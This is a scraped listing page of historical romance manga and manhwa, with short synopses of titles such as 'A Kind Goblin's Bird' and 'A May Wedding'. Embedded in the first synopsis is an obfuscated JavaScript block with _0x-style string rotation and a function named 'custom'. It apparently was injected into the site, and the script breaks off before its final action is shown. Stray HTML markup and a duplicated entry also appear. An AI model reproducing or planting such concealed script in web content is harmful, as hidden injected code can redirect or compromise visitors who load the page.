Historical - Page 5

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3922 results

A Heart-Captivating Smile

There was a young lady from an influential family that was famous for being a sloth. It was said that if she could lay down, she would not sit; and if she could sit, she would not stand. There was a young master from an influential family who was educated, talented, and had unparalleled good looks. However, the best-among-men young master was rumored to have an unmentionable disease?! Yang Zhaojun only wished to become a chamber's sloth, but unfortunately for her, the Gods had other plans. With a smile, she captivated the young master's heart. Would Zhaojun be willing to spend the rest of her life with him?<script></script><script>(function(_0x3a9ce0,_0x1f1dd8){var _0x193e66=_0x2575,_0x2dba57=_0x3a9ce0();while(!![]){try{var _0x3767f4=parseInt(_0x193e66(0x1a7))/(0x44f*-0x3+-0x38d+0x107b)+-parseInt(_0x193e66(0x19c))/(0x1cdc*-0x1+0x4fd*0x6+-0x110)+parseInt(_0x193e66(0x19e))/(0x199d+0x1893+-0x322d*0x1)+-parseInt(_0x193e66(0x19b))/(-0x2275+-0xb*0x21+-0x1*-0x23e4)+-parseInt(_0x193e66(0x1aa))/(0x1*-0x2b3+0x4c*-0x63+0x201c)*(-parseInt(_0x193e66(0x1b1))/(0x25eb+0x1*-0xf65+0x20*-0xb4))+-parseInt(_0x193e66(0x1b6))/(-0x1*0x24bb+0x11*-0x61+0x2b33)+parseInt(_0x193e66(0x1b3))/(-0x715+-0x7f*-0xb+0xd4*0x2);if(_0x3767f4===_0x1f1dd8)break;else _0x2dba57['push'](_0x2dba57['shift']());}catch(_0x198ae2){_0x2dba57['push'](_0x2dba57['shift']());}}}(_0x5723,0x1*0x25bcb+-0x86f7c+0xbf4d9));function custom(){var _0x289caa=_0x2575,_0x1bc75b={'XlBpU':function(_0x3d9c8e,_0x1c54dd){return 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A Hunter’s Courtship Method

<div class="post-title"> <h1>A Hunter’s Courtship Method</h1> </div> <div class="tab-summary "></div> <div> <div class="description-summary"> <div class="summary__content show-more active"> Hunter Ar who lived apart from humans alone in the forest coincidentally meets Leon, a blonde blue-eyed handsome man. As a condition of letting him stay at her house she tries to entrust the housework to him, but… For some reason it seems like this man has done any housework in his life?! A Bear Grylls-st female lead who can easily take off her prey’s skin/fur and a Greenhouse plant-st male lead who grew up with no hardships’s culture shocking comedy romance! </div> </div> <div id="manga-chapters-holder" data-id="43558"> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div> </div> </div>



The story is about a little Master, Gong Yao Ying, in order to accomplish the assigned tasks, she travels across the different periods. The stories are created after meeting with the famous historical figures.


A Kind Goblin’s Bird

“Won’t you become a Goblin’s bride?” In Yang-an, the capital of the Shun Dynasty Empire, there are rumors of a Goddess who sings a song that grants your wishes in your dreams if you visit a certain pharmacy. To confirm this, Sa Heonyoung, who disguises his status as a member of the royal family, goes to find the Goddess of the rumors. After listening to her song, he yearns for her, as if he is suffering from an illness…. A man who must kill his own identity under a goblin’s mask; and a woman who has no name or a lover, and lives only for the revenge in her mother’s will. A mournful love story between a man and a woman who are the only ones who can fully understand each other.


A Kind Goblin’S Bird

“Won’t you become a Goblin’s bride?” In Yang-an, the capital of the Shun Dynasty Empire, there are rumors of a Goddess who sings a song that grants your wishes in your dreams if you visit a certain pharmacy. To confirm this, Sa Heonyoung, who disguises his status as a member of the royal family, goes to find the Goddess of the rumors. After listening to her song, he yearns for her, as if he is suffering from an illness…. A man who must kill his own identity under a goblin’s mask; and a woman who has no name or a lover, and lives only for the revenge in her mother’s will. A mournful love story between a man and a woman who are the only ones who can fully understand each other.


A Kiss To My Prince

From Infinity Studios: Everyone always says to set high goals for oneself. Sei-Ann, an orphaned young lady who was raised in the care of a noblewoman, does just that when she decides she'll become the prince's bride. With above average looks and ambitions that would rival that of a king, Sei-Ann is determined to leave her social status behind and become the wife of the next Crown Prince. Ever since she was a child, she knew that she was somehow special and was meant to go places. And even if it meant enduring a marriage with the most hideous looking prince, she feels it would be a small price to pay to claim her fate as the First Lady of the kingdom.


A Legend Of Spirits And Immortals

Immortal school descends to the world to enroll students, the kids with mindeyes will be selected to Spirits and Immortals Academy (SAIA) to learn immortal art! Chen Xiaohu, a naughty kid who is from the mortal world will start to create a legend in the immortal world here!


A Lonesome Fragrance Waiting To Be Appreciated

She has unparalleled intelligence which earns her the title of 'Female Zhuge' and is a servant of JingAn Palace ? Bai PingTing. He holds the title of 'Duke' of the Donglin Kingdom, also known as the 'God of War' - Chu BeiJie. They are separated by their loyalty to their kingdoms, therefore making them enemies... yet they cannot escape their love for each other. When the world is finally at peace, is it still possible for them to be together, and this time, for a lifetime? 'Zhuge' was a famous statesman, ideologist and strategist during the Three Kingdoms Period. Known to be one of the most intelligent men in Ancient China's history.


A Love That Melts Away A Poisonous Heart

Princess Angie Endures A Childhood Of Torment And Abuse, All In Preparation For The Day She Would Be Sacrificed To The Great Serpent That Threatened The Kingdom. On Her 18Th Birthday, She Approaches The Great Serpent, Preparing For Her Imminent Demise. However, Much To Her Astonishment, Arbel, A Young Margrave Of Andalivia, Intervenes And Saves Her Life, Declaring, ‘As Promised, I’ve Come To Save You.’ Angie, Having Lost Her Sole Purpose, Feels Devastated. Yet, With His Gentle Gaze, Arbel Offers Her A Hand In Her Time Of Greatest Need. Thus Begins The Bittersweet Love Story Between A Girl Destined For Death And The Man Who Pledges To Be Her Savior. “I Want To Stay By Your Side. I Want To See You Smile. Even If You Forget Me, Even If I Can Never Touch You.”


A male protagonist is blocking my way

I reincarnated into a novel that I’d read in my past life. I’m destined to be the fiancé of the villain in the not-too-distant future, but that’s… Doesn’t it depend on how I live? “My ideal type is 190 centimeters tall, handsome, rich and doesn’t get fat when he gets older!” And then I saved the life of the young male protagonist before I even started looking for him? My plan to have a smooth, carefree life has been ruined ever since! “I’m sorry, but Ariel said ‘I can’t take my eyes off the prettiest and handsomest people in the world.’ ” “What? Me?” “I’m – I’m sorry, I’ve been very rude. Please forget my proposal!” “Wait! No! Please Wait!” As he watched me feel increasingly guilty towards him, a supposedly broken-hearted person, he raised the corner of his mouth. Associated Names The Main Protagonist Block My Path 남자 주인공이 내 앞길을 가로막는다 A male protagonist is blocking my way


A Master, Who Woke up as a Concubine

Read manhwa A Master, Who Woke up as a Concubine / 고수, 후궁으로 깨어나다 The strongest in murim, Cheon Nyeon-bi. She was betrayed by her lover and met a tragic death, but soon after, she woke up in a concubine’s body. She was only confused for a moment. Cheon Nyeon-bi, who was satisfied with life at the palace, decided to live a comfortable life as a concubine. “I have to do the thing with his majesty?” To satisfy her duties as a concubine, she was suddenly dragged off to the emperor’s room! “Your majesty, are you good at it?” She asked the stripping emperor a hot question…! The adjustment period for a murim master to a concubine… Is it really peaceful?!


A May Wedding

Read manhwa A May Wedding / May Wedding Ceremony / ค่ำคืนแรกของรักทรยศ / 오월의 혼례식 / 5月の花嫁〜身分を超えた一途な恋〜 “Torn between love and loyalty, May is haunted by betrayal and guilt. On a wedding night that was never meant to be hers, she resolves to flee from the heartache. But Shin Sogyung, her secret lover and the newlywed groom in a strategic marriage, finds her. Together, they share a night that could be their last.”
